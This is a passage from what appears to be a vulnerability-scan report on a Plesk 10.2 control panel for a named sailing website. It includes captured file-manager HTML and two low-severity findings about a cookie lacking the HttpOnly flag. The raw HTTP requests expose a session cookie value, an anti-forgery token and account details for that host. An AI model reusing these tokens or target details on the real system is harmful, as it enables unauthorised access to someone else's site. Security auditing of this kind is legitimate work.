href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpsdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_private" value="private" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();">private</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=private" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fprivate" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_statistics" value="statistics" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();">statistics</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=statistics" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fstatistics" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_subdomains" value="subdomains" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" onClick=";lon();">subdomains</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=subdomains" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fsubdomains" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_vault_scripts" value="vault_scripts" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();">vault_scripts</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=vault_scripts" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fvault_scripts" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_web_users" value="web_users" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();">web_users</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=web_users" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fweb_users" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_.Security" value=".Security" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=.Security" onClick="return bin();;lon();">.Security</a></td><td class="number">24.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=.Security" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2F.Security" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=.Security" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/edit/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.25. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/permissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/permissions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/permissions/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:35 GMT
Connection: close
Content-Length: 14908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Operation failed</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {
hideinfo_oC(document.forms[0]);
$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/unhandlederror/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function update_oC(f)
       {
           f.cmd.value="update";
           f.submit();
           return false;
       }
       function showinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "commonButton";
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "formArea";
               }
               }
           }
           return false;
       }
       function hideinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "commonButton";
               }
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "hiddenElement";
               }
           }
           return false;
       }
       function submitticket_oC(f)
       {
           f.cmd.value="submitticket";
           f.submit();
           return false;
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/permissions/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <style>
.hiddenElement {
display: none;
}
</style>

<div class="formArea">

<div><img src="/skins/default/plesk/icons/off.gif" width="16" height="16" align="absmiddle">&nbsp;The operation you were performing failed. You can retry the operation with or without changing its parameters. You may also want to report this problem to our support so that we could help you as soon as possible.</div>
<div class="formButtons">
   <table width="100%" cellspacing="0" cellpadding="0"><tr>
       <td align="left" width="0"><DIV class="commonButton" id="bid-unhandlederror-showinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to view detailed information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_showinfo" id="buttonid-unhandlederror-showinfo" type="button" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;">Show Details</BUTTON><SPAN id="spanid-unhandlederror-showinfo">Show Details</SPAN></DIV><DIV class="commonButton" id="bid-unhandlederror-hideinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide additional information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_hideinfo" id="buttonid-unhandlederror-hideinfo" type="button" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;">Hide Details</BUTTON><SPAN id="spanid-unhandlederror-hideinfo">Hide Details</SPAN></DIV></td>
       <td class="misc" width="0"><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV></td>
   </tr></table>
</div>


</div>
<div class="hiddenElement" id="errorArea">
<br>Additional Information<br><br>
   <textarea rows=20 name="description" readonly>
FileManager::get_file_info_wrapper() failed: filemng util failed: Empty input path: (87) The parameter is incorrect.
---------------------- Debug Info -------------------------------
0: FilePermissionsUIPointer.php:34
   FilePermissionsUIPointer-&gt;accessItem(string &#039;GET&#039;, NULL null)
1: UIPointer.php:600
   UIPointer-&gt;access(string &#039;GET&#039;)
2: plesk.php:47
   </textarea>
</div>





</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.26. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/rename/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/rename/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
